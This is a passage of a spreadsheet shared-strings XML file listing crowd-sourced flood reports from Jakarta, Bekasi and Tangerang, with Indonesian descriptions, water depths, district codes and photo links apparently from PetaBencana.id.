    <t>Banjir Wilayah Binong Permai Blok I RT.004/014, saat ini Hujan tambah deras</t>
  </si>
  <si>
    <t>f701638b-cb3c-460f-9fc3-f1a3d226e1fc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f701638b-cb3c-460f-9fc3-f1a3d226e1fc.jpg</t>
  </si>
  <si>
    <t>Banjir Wilayah Binong Permai Blok I RT.004/014 Binong Curug Tangerang, Hujan semakin deras, banjir meluas diwilayah Blok I Binong Permai</t>
  </si>
  <si>
    <t>87b44bce-810f-4e7d-9390-58797bf9da80</t>
  </si>
  <si>
    <t>https://images.petabencana.id/87b44bce-810f-4e7d-9390-58797bf9da80.jpg</t>
  </si>
  <si>
    <t>Perum 3 Bencongan Indah</t>
  </si>
  <si>
    <t>Bencongan Indah</t>
  </si>
  <si>
    <t>c05e3a03-58e0-42cc-8a95-f7efd9de145b</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "118", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Pinggir kali tapi banjir mulu donggg, ayoo dong ada perubahannnnnnn</t>
  </si>
  <si>
    <t>d2f13ece-332c-48cb-bf63-43a9d5540840</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d2f13ece-332c-48cb-bf63-43a9d5540840.jpg</t>
  </si>
  <si>
    <t>JL.Kebon Pala 1 Tanah Rendah Gang.2 RT3&amp;RT6 RW07</t>
  </si>
  <si>
    <t>03049d0d-62f2-4668-b194-87b350e08d26</t>
  </si>
  <si>
    <t>https://images.petabencana.id/03049d0d-62f2-4668-b194-87b350e08d26.jpg</t>
  </si>
  <si>
    <t>Jl. Cipinang latihan RT 14 RW 13, cpinang besar utara, jatinegara, jakarta timur</t>
  </si>
  <si>
    <t>7b0f9b04-aba0-41cb-a105-6c23f6566e86</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7b0f9b04-aba0-41cb-a105-6c23f6566e86.jpg</t>
  </si>
  <si>
    <t>Lambat tapi pasti genangan mulai naik dan masuk ke dalam rumah. Tolong Pompa Air Tomang Raya dimaksimalkan agar genangan t semakin tinggi.</t>
  </si>
  <si>
    <t>8b70adef-d380-4be5-9d61-b1825af41f57</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8b70adef-d380-4be5-9d61-b1825af41f57.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "873", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>0176217d-638d-4f8d-b63d-75c2aa06932f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0176217d-638d-4f8d-b63d-75c2aa06932f.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2163", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir sudah terjadi dari tanggal 23 tetapi tidak kunjung surut.dan tidak ada juga penanganan dari pemerintah</t>
  </si>
  <si>
    <t>Marunda</t>
  </si>
  <si>
    <t>747131e9-ef23-4ab0-87b2-98e416660bfa</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1835", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Komplek BHP</t>
  </si>
  <si>
    <t>a9a0f9c3-54c7-4243-8f00-b3efd009a5e4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a9a0f9c3-54c7-4243-8f00-b3efd009a5e4.jpg</t>
  </si>
  <si>
    <t>Jatikramat</t>
  </si>
  <si>
    <t>03ce049b-74e8-49ba-bd60-79e6037bf486</t>
  </si>
  <si>
    <t>https://images.petabencana.id/03ce049b-74e8-49ba-bd60-79e6037bf486.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2567", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>ab797066-984c-4bae-9ef5-f5cb1794743a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ab797066-984c-4bae-9ef5-f5cb1794743a.jpg</t>
  </si>
  <si>
    <t>Banjir di komplek duta indah, jatimakmur, pondok gede, bekasi</t>
  </si>
  <si>
    <t>0f724ebd-ea85-4c2c-bd5e-1c837bb11a76</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0f724ebd-ea85-4c2c-bd5e-1c837bb11a76.jpg</t>
  </si>
  <si>
    <t>tahun 2020 udah banjir 4 kali dalam 2 bulan padahal tahun2 sebelumnya tidak pernah banjir terparah didalam rumah sebetis diluar lebih parah</t>
  </si>
  <si>
    <t>3eebf9e7-810f-424a-8502-72e3e3ea053d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3eebf9e7-810f-424a-8502-72e3e3ea053d.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "111", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Sudah 2x ini, setiap turun hujan, selalu banjir, biasanya tdk pernah, Hujan pertama ditanggal 23 Februari 2020 rumah saya kemasukan sampai"</t>
  </si>
  <si>
    <t>58d077fe-014c-4fb7-9d63-3146832d0e83</t>
  </si>
  <si>
    <t>air sudah meluap dari kali</t>
  </si>
  <si>
    <t>27339287-f911-4a85-b9c9-f3249ea211f7</t>
  </si>
  <si>
    <t>banjir sebetis cipinang indah</t>
  </si>
  <si>
    <t>4c94160d-aa81-4ad9-b4c6-6cd118e94ebb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4c94160d-aa81-4ad9-b4c6-6cd118e94ebb.jpg</t>
  </si>
  <si>
    <t>Ketinggian air pada ukuran 2.40cm</t>
  </si>
  <si>
    <t>700cdf3d-1b7f-4d55-9e10-c1853f2d34f9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/700cdf3d-1b7f-4d55-9e10-c1853f2d34f9.jpg</t>
  </si>
  <si>
    <t>Banjir di depan rumah jalan nirbaya 3 rt. 10 rw. 03 sudah berkali kali laporan ke rt rw tapi tidak ada tindakan, mengakibatkan kerugian warg</t>
  </si>
  <si>
    <t>93c15b12-2cb5-4154-8581-90cc5bcef2f5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/93c15b12-2cb5-4154-8581-90cc5bcef2f5.jpg</t>
  </si>
  <si>
    <t>Perumahan griya kencana II</t>
  </si>
  <si>
    <t>Sudimara Jaya</t>
  </si>
  <si>
    <t>5c58a45e-c88f-4503-993e-1e340288f99d</t>
  </si>
  <si>
    <t>Villa Bintaro Regency Blok C</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349500</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/02/25/349500-15825686511509732634.mov-03.jpg</t>
  </si>
  <si>
    <t>Hati Hati Melintas, Ada Genangan Air di Fly Over Jatiasih</t>
  </si>
  <si>
    <t>Terdapat genangan air yang cukup tinggi tepatnya di depan showroom Honda atau fly over Jatiasih akibat curah hujan yang cukup lama malam ini. beberapa pemotor ragu ragu untuk melewatinya.</t>
  </si>
  <si>
    <t>2dde7095-62e1-4ab4-a81e-ce695bbc7059</t>
  </si>
  <si>
    <t>Sekitar jam 1.30 banjir dengan ketinggian 60cm</t>
  </si>
  <si>
    <t>Porisgaga Baru</t>
  </si>
  <si>
    <t>Batuceper</t>
  </si>
  <si>
    <t>36a1165e-34bf-4c3f-bc5f-473346694327</t>
  </si>
  <si>
    <t>Pondok Gading dan sekitar nya sudah 30 cm</t>
  </si>
  <si>
    <t>a0bf7226-859b-4652-9662-fee541b6818d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a0bf7226-859b-4652-9662-fee541b6818d.jpg</t>
  </si>
  <si>
    <t>Banjir di perumahan duren jaya</t>
  </si>
  <si>
    <t>eb61d612-b242-4e00-83c4-4cb85af55c60</t>
  </si>
  <si>
    <t>https://images.petabencana.id/eb61d612-b242-4e00-83c4-4cb85af55c60.jpg</t>
  </si>
  <si>
    <t>Banjir 20-50 cm di Jl. Bulak Barat 2 RT.01/07 dan sekitarnya, Klender, Duren Sawit, Jakarta Timur</t>
  </si>
  <si>
    <t>1ad222a1-8808-4764-a376-2659d646a999</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1ad222a1-8808-4764-a376-2659d646a999.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2126", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>07fdb537-9c03-405e-8ec2-d7185ccbd134</t>
  </si>
  <si>
    <t>83d05686-c1a9-48fb-a259-84e3658c356e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/83d05686-c1a9-48fb-a259-84e3658c356e.jpg</t>
  </si>
  <si>
    <t>Banjir terus. Daerah rawa trate cakung jaktim</t>
  </si>
  <si>
    <t>8a44bb1a-ceb2-4d68-bea1-ed73d5a4d8b1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8a44bb1a-ceb2-4d68-bea1-ed73d5a4d8b1.jpg</t>
  </si>
  <si>
    <t>Banjir di perumahan pondok lakah permai, ketinggian saat ini jam 03.30 sekitar 80-90cm.hujan intensitas sedang masih berlangsung.</t>
  </si>
  <si>
    <t>fddd6f95-0ad2-4939-b36e-bcfe212382ee</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fddd6f95-0ad2-4939-b36e-bcfe212382ee.jpg</t>
  </si>
  <si>
    <t>a05799c4-cf15-4eb1-a15b-85f22040e15b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a05799c4-cf15-4eb1-a15b-85f22040e15b.jpg</t>
  </si>
  <si>
    <t>Ketinggian air meningkat perlahan dari jam 1, tidak terlihat akan surut karena masih hujan</t>
  </si>
  <si>
    <t>89e39ab0-6761-4c1a-9943-5af44c08aada</t>
  </si>
  <si>
    <t>https://images.petabencana.id/89e39ab0-6761-4c1a-9943-5af44c08aada.jpg</t>
  </si>
  <si>
    <t>Air sudah masuk hujannya belum juga reda</t>
  </si>
  <si>
    <t>Jatimurni</t>
  </si>
  <si>
    <t>Pondokmelati</t>
  </si>
  <si>
    <t>a2c6de53-5443-4948-b640-7fc9d24e90c2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a2c6de53-5443-4948-b640-7fc9d24e90c2.jpg</t>
  </si>
  <si>
    <t>Masih tambah tinggi, Pulogadung</t>
  </si>
  <si>
    <t>9f71abef-5b22-4430-8954-9647a5f5ff2a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9f71abef-5b22-4430-8954-9647a5f5ff2a.jpg</t>
  </si>
  <si>
    <t>Banjir untuk yang ke empat kalinya, dan yang ketiga kalinya air masuk rumah</t>
  </si>
  <si>
    <t>aa6ab7a0-5974-4b4e-8500-a6b11e147f0c</t>
  </si>
  <si>
    <t>Sudah masuk dpn rumah.</t>
  </si>
  <si>
    <t>60975dd6-a280-4130-8849-16dc321e46e9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/60975dd6-a280-4130-8849-16dc321e46e9.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 46, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Air masih terus naik</t>
  </si>
  <si>
    <t>1d6781f4-2d2f-4158-8e15-0bce77174319</t>
  </si>
  <si>
    <t>Puri Bintara Regency</t>
  </si>
  <si>
    <t>041446a9-f7e6-42d1-92d8-1c31894c629a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/041446a9-f7e6-42d1-92d8-1c31894c629a.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 72, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Sekarang sudah jauh berbeda dari foto</t>
  </si>
  <si>
    <t>ff3035d4-e123-4554-ba92-87e995db10eb</t>
  </si>
  <si>
    <t>Banjir daerah bekasi pondok ungu permai sektor V</t>
  </si>
  <si>
    <t>e7c760ce-1b35-4cde-9c53-0d1c55c612c1</t>
  </si>
  <si>
    <t>Mangunjaya</t>
  </si>
  <si>
    <t>72725ab0-201d-4c57-839e-7cad18d49bfd</t>
  </si>
  <si>
    <t>https://images.petabencana.id/72725ab0-201d-4c57-839e-7cad18d49bfd.jpg</t>
  </si>
  <si>
    <t>kelurahan kranji. perum duta kranji</t>
  </si>
  <si>
    <t>c6364976-154a-41ef-a42e-94afc7ce0bd7</t>
  </si>
  <si>
    <t>Perumahan de sanctuary, air sudah mencapai pinggang orang dewasa</t>
  </si>
  <si>
    <t>80500366-9ee9-41d1-b188-b260c9eda77e</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 30, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2316", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir sudah masuk ke rumah-rumah</t>
  </si>
  <si>
    <t>3e10a7e4-cbab-438b-8d70-83c6ee159a97</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3e10a7e4-cbab-438b-8d70-83c6ee159a97.jpg</t>
  </si>
  <si>
    <t>perum griya asri taman mini banjir</t>
  </si>
  <si>
    <t>97967d23-aabc-43c7-8b65-1c42cfd6f5ad</t>
  </si>
  <si>
    <t>Jatimakmur banjir</t>
  </si>
  <si>
    <t>65d832df-0bc3-48d9-9915-3074bd797c39</t>
  </si>
  <si>
    <t>https://images.petabencana.id/65d832df-0bc3-48d9-9915-3074bd797c39.jpg</t>
  </si>
  <si>
    <t>1631a6ac-dcee-47a6-bfa8-a94c42db873c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1519", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir masuk rumah setinggi paha orang dewasa</t>
  </si>
  <si>
    <t>3169e673-00ee-4912-9c5c-0fab93676cbe</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3169e673-00ee-4912-9c5c-0fab93676cbe.jpg</t>
  </si>
  <si>
    <t>Jatiwaringin asri banjir sudah sekitar 30cm</t>
  </si>
  <si>
    <t>93622772-e837-4932-8080-98332cd7590d</t>
  </si>
  <si>
    <t>Banjir kali meluap</t>
  </si>
  <si>
    <t>13f1204e-82f9-4c56-a7f0-d589976bb26b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/13f1204e-82f9-4c56-a7f0-d589976bb26b.jpg</t>
  </si>
  <si>
    <t>Perumahan Jatimulya Tambun Selatan, 17510</t>
  </si>
  <si>
    <t>e12bb942-b7fc-4ef3-a6c9-df028e8d0406</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e12bb942-b7fc-4ef3-a6c9-df028e8d0406.jpg</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 70, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1314", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di Komp.Sangrila Indah 2, RT 05/06,  Kel. Petukangan Selatan, Kec. Pesanggrahan,Jaksel , ketinggian air 70-80 cm</t>
  </si>
  <si>
    <t>Petukangan Selatan</t>
  </si>
  <si>
    <t>cdaffea2-c90b-4176-a994-424b998cbc55</t>
  </si>
  <si>
    <t>Perumahan Duta Indah</t>
  </si>
  <si>
    <t>aa2348ef-6372-4521-abbf-96789ee42c8e</t>
  </si>
  <si>
    <t>Banjir udah masuk rmh dr jam stgh 3 Wilayah rawa putat jaticempaka pondok gede bekasi"</t>
  </si>
  <si>
    <t>8bd7b489-ebd5-4f20-aa4d-93bc722eae14</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8bd7b489-ebd5-4f20-aa4d-93bc722eae14.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1474", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>fce40dad-9299-4922-86ee-24a30b61a904</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 37, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir di Bumi Harapan Permai 30cm-+ Pukul 4 pagi</t>
  </si>
  <si>
    <t>ff654f02-a46d-4496-bc37-820f3926460f</t>
  </si>
  <si>
    <t>7f4416b5-1af8-48f7-83c6-0fc66c38515d</t>
  </si>
  <si>
    <t>Janur Asri. Banjir 35 cm</t>
  </si>
  <si>
    <t>0ce2045a-07dd-4880-ac72-12cdf07b79f6</t>
  </si>
  <si>
    <t>Ujan dikit langsung banjir... lelah bersihinnya</t>
  </si>
  <si>
    <t>ee412bdf-8297-481d-9c7e-709dccefb281</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ee412bdf-8297-481d-9c7e-709dccefb281.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "824", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir 70 cm mulai masuk rumah dari sekitar pukul 3</t>
  </si>
  <si>
    <t>dd49aaaa-15da-4349-820a-80df1ec5bf65</t>
  </si>
  <si>
    <t>https://images.petabencana.id/dd49aaaa-15da-4349-820a-80df1ec5bf65.jpg</t>
  </si>
  <si>
    <t>Luapan air di jln terusan inspeksi Kali sunter meluber sehingga terjadi banjir serta hujan deras masih menguyur 4:18</t>
  </si>
  <si>
    <t>a7de083c-2db2-4c37-9bca-fb72ca9321e3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a7de083c-2db2-4c37-9bca-fb72ca9321e3.jpg</t>
  </si>
  <si>
    <t>pondok ungu permai sektor 5 mulai merayap naik, ketinggian air di jalan sudah 30cm</t>
  </si>
  <si>
    <t>f2445596-80f1-4b8a-a262-907d6e9b4821</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f2445596-80f1-4b8a-a262-907d6e9b4821.jpg</t>
  </si>
  <si>
    <t>Tuh dah masuk sampe ruang tamu jd bisa taroh ikan dong :p</t>
  </si>
  <si>
    <t>04fa2acc-ed1f-429c-afd9-b95a5a0b5b8f</t>
  </si>
  <si>
    <t>Ngk bisa ambil foto takut kecemplung ke air hpnya</t>
  </si>
  <si>
    <t>a98dfa8b-e191-4d07-a5fe-7ea12762c58e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a98dfa8b-e191-4d07-a5fe-7ea12762c58e.jpg</t>
  </si>
  <si>
    <t>Foto diambil pukul 02.30, sekarang sudah sepaha</t>
  </si>
  <si>
    <t>f66d0b1b-bedd-4fe7-904b-fe681501f631</t>
  </si>
  <si>
    <t>banjir mulai memasukki rumah warga dengan cepat</t>
  </si>
  <si>
    <t>3f100008-2a60-4570-970f-e2f8451e6565</t>
  </si>
  <si>
    <t>Air sudah mulai naik di beberapa lokasi</t>
  </si>
  <si>
    <t>Lambangsari</t>
  </si>
  <si>
    <t>f0b56b74-e533-45be-a29c-79a2ad9cc695</t>
  </si>
  <si>
    <t>Perumahan Kelapa Hibrida</t>
  </si>
  <si>
    <t>9dcde2ab-a59e-456f-907b-73c0ecfc2e8c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9dcde2ab-a59e-456f-907b-73c0ecfc2e8c.jpg</t>
  </si>
  <si>
    <t>Jl. Cipinang Latihan RT14 RW13, cipinang besar utara, jatinegara, jakarta timur</t>
  </si>
  <si>
    <t>228da148-5280-463c-bf7a-7ae83ae10f12</t>
  </si>
  <si>
    <t>https://images.petabencana.id/228da148-5280-463c-bf7a-7ae83ae10f12.jpg</t>
  </si>
  <si>
    <t>Banjir di Harapan Baru regency, Bekasi barat</t>
  </si>
  <si>
    <t>ac04afbb-d634-4975-ab58-f3829e4cf1fb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ac04afbb-d634-4975-ab58-f3829e4cf1fb.jpg</t>
  </si>
  <si>
    <t>Banjir sepahaa, di pondok timur indah, bekasi timur</t>
  </si>
  <si>
    <t>61890b41-f811-4795-9699-a8e5ccc27c92</t>
  </si>
  <si>
    <t>https://images.petabencana.id/61890b41-f811-4795-9699-a8e5ccc27c92.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 127, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1666", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir setinggi dada org dewasa, belum ada bantuan samasekali:(</t>
  </si>
  <si>
    <t>a88e1f68-6a8e-4066-9b74-687047563498</t>
  </si>
  <si>
    <t>ketinggian air terua meningkat karena intensitas hujan bertambah</t>
  </si>
  <si>
    <t>51f78ccf-76b2-4fc3-b4c4-1ac388b7fff1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/51f78ccf-76b2-4fc3-b4c4-1ac388b7fff1.jpg</t>
  </si>
  <si>
    <t>D.I Panjaitan banjir</t>
  </si>
  <si>
    <t>40e3e8b8-3b62-41f0-a06b-35322c6fc675</t>
  </si>
  <si>
    <t>https://images.petabencana.id/40e3e8b8-3b62-41f0-a06b-35322c6fc675.jpg</t>
  </si>
  <si>
    <t>ce8601ce-84fe-4319-a72d-e6a4bef8bb6e</t>
  </si>
  <si>
    <t>Banjir di perumahan Bulog 3 Jatimelati</t>
  </si>
  <si>
    <t>Jatimelati</t>
  </si>
  <si>
    <t>c55bd3b5-6e08-4d14-bc4f-e8160aeb9deb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c55bd3b5-6e08-4d14-bc4f-e8160aeb9deb.jpg</t>
  </si>
  <si>
    <t>PERUM ANEKA ELOK BLOK D10</t>
  </si>
  <si>
    <t>aefbe116-cf27-4fb5-8b7b-fd84c5e6573e</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2046", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>10c5232d-aeef-4623-8e1e-e35a4e2559e6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/10c5232d-aeef-4623-8e1e-e35a4e2559e6.jpg</t>
  </si>
  <si>
    <t>Perumahan Puri Bintaro Hijau Blok H</t>
  </si>
  <si>
    <t>d8f0cce5-d510-4de8-af00-47f31ffbf57b</t>
  </si>
  <si>
    <t>Banjir di komplek TGR</t>
  </si>
  <si>
    <t>928c2434-7391-4404-8270-553f518e7700</t>
  </si>
  <si>
    <t>https://images.petabencana.id/928c2434-7391-4404-8270-553f518e7700.jpg</t>
  </si>
  <si>
    <t>Banjir di perumahan pondok lakah paninggilan ciledug tangerang, ketinggian 80-90cm</t>
  </si>
  <si>
    <t>a9bafef3-11e7-4d53-b78d-2f111b331783</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a9bafef3-11e7-4d53-b78d-2f111b331783.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "619", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir untuk yang ketiga kali nya dan yang ini lebih parah dari yang sebelumnya</t>
  </si>
  <si>
    <t>c42507d9-9150-4748-ac55-246429f16131</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c42507d9-9150-4748-ac55-246429f16131.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 103 }</t>
  </si>
  <si>
    <t>Banjir di Jatimulya RT 001/015. Tinggi air sekitar 110 meter</t>
  </si>
  <si>
    <t>389f2314-25e5-482a-811a-8692c7e99e04</t>
  </si>
  <si>
    <t>https://images.petabencana.id/389f2314-25e5-482a-811a-8692c7e99e04.jpg</t>
  </si>
  <si>
    <t>Udah sedengkul di jalan depan rumah</t>
  </si>
  <si>
    <t>bad477d7-aee5-4695-9aae-e7714640993c</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "594", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Pertama kali banjir setelah tahun 2015. Banjir sudah setinggi lutut orang dewasa.</t>
  </si>
  <si>
    <t>6f811e66-e90d-4889-adad-01f9ab8c1f51</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6f811e66-e90d-4889-adad-01f9ab8c1f51.jpg</t>
  </si>
  <si>
    <t>Banjir untuk kesekian kalinya Cempaka Putih</t>
  </si>
  <si>
    <t>efbfe4dd-4ec1-499e-bb8b-a437d20ccd14</t>
  </si>
  <si>
    <t>71d00fc6-a7e6-4c3e-8058-ae138b8d1a19</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1419", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Rusun Griya Tipar Cakung, 50 CM"</t>
  </si>
  <si>
    <t>48381a8d-f1d6-475a-933a-c92276814e1f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/48381a8d-f1d6-475a-933a-c92276814e1f.jpg</t>
  </si>
  <si>
    <t>Banjir jam 4:30 kawasan pekayon, ujan dari jam11 mlm hingha 5 pagi blm berhenti</t>
  </si>
  <si>
    <t>9b48f9d2-186d-45af-bfed-c2bfae3e9cb4</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "637", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Utan Panjang</t>
  </si>
  <si>
    <t>c2006ae9-53f1-42f8-aabd-e549d3aa9cf1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c2006ae9-53f1-42f8-aabd-e549d3aa9cf1.jpg</t>
  </si>
  <si>
    <t>Jalan kenangan III</t>
  </si>
  <si>
    <t>82aab536-d586-4fe0-b22b-2020f36529ab</t>
  </si>
  <si>
    <t>Untuk yg ke sekian kali nya banjir</t>
  </si>
  <si>
    <t>ee539e6e-ef63-4cf5-b476-63e161e4608d</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "484", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir setinggi lutut orang dewasa, di kelurahan cempaka baru, kemayoran</t>
  </si>
  <si>
    <t>8580efe7-60fc-4552-911a-6db1c1f07589</t>
  </si>
  <si>
    <t>Kemarin blom surut, sdh naik lagi banjrnya</t>
  </si>
  <si>
    <t>b11ce61e-6b67-4f25-a73e-fb4377872f4e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b11ce61e-6b67-4f25-a73e-fb4377872f4e.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 99 }</t>
  </si>
  <si>
    <t>Banjir di kecamatan Ciracas, Jakarta Timur pada pukul 5 pagi waktu setempat. Ketinggian air di jalanan hampir mencapai 1 meter.</t>
  </si>
  <si>
    <t>4d25d5fc-d9f2-4fc8-aa6a-7e3b98e06e60</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4d25d5fc-d9f2-4fc8-aa6a-7e3b98e06e60.jpg</t>
  </si>
  <si>
    <t>banjir mulai jam 3 dini hari</t>
  </si>
  <si>
    <t>ca9fe667-601a-4c6c-9de4-87d7fc385dab</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ca9fe667-601a-4c6c-9de4-87d7fc385dab.jpg</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 25, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "569", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Air semata kaki dewasa, ke arah gunung sahari level genangan semakin tinggi</t>
  </si>
  <si>
    <t>a07fd604-8b5c-47fb-a972-08c416b9ef0c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a07fd604-8b5c-47fb-a972-08c416b9ef0c.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2112", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir masih naik, karena ujan masih terus berlanjut</t>
  </si>
  <si>
    <t>e034e28e-c676-4888-8778-6c565cc89a6a</t>
  </si>
  <si>
    <t>Banjir di jalan squadron Halim Perdanakusuma</t>
  </si>
  <si>
    <t>eb897249-c5a0-4ac8-97e3-21c09c5dc599</t>
  </si>
  <si>
    <t>https://images.petabencana.id/eb897249-c5a0-4ac8-97e3-21c09c5dc599.jpg</t>
  </si>
  <si>
    <t>434b623d-2829-4024-b6c9-9f78dc4f2968</t>
  </si>
  <si>
    <t>https://images.petabencana.id/434b623d-2829-4024-b6c9-9f78dc4f2968.jpg</t>
  </si>
  <si>
    <t>81bf70f6-98e1-46dc-b6b8-b100434e94e4</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1145", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t xml:space="preserve">banjir selutut orang dewasa </t>
  </si>
  <si>
    <t>cdac09a4-5458-4b2e-b509-b9e10667aa77</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cdac09a4-5458-4b2e-b509-b9e10667aa77.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2287", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Perumahan danau indah banjir 20cm</t>
  </si>
  <si>
    <t>a7bc5e15-67d6-41d8-84f6-75ecebe56993</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a7bc5e15-67d6-41d8-84f6-75ecebe56993.jpg</t>
  </si>
  <si>
    <t>Kondisi di dlm rumah sudah hampir 40 cm. Diluar sudah lebih tinggi sekitar 60 cm</t>
  </si>
  <si>
    <t>e85ac82e-bfd7-4a1a-a29b-b8ad40c02451</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1482", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir setinggi betis di jalan luar</t>
  </si>
  <si>
    <t>567910ba-8191-4199-9fd9-5818dbc6c94c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/567910ba-8191-4199-9fd9-5818dbc6c94c.jpg</t>
  </si>
  <si>
    <t>Perumahan Bekasi Timur Permai, Tambun- kab. Bekasi</t>
  </si>
  <si>
    <t>150a5d09-3799-4089-a2ec-5bdd5323bc5b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/150a5d09-3799-4089-a2ec-5bdd5323bc5b.jpg</t>
  </si>
  <si>
    <t>46c64347-e9e9-4a58-986c-e6f8bf11012c</t>
  </si>
  <si>
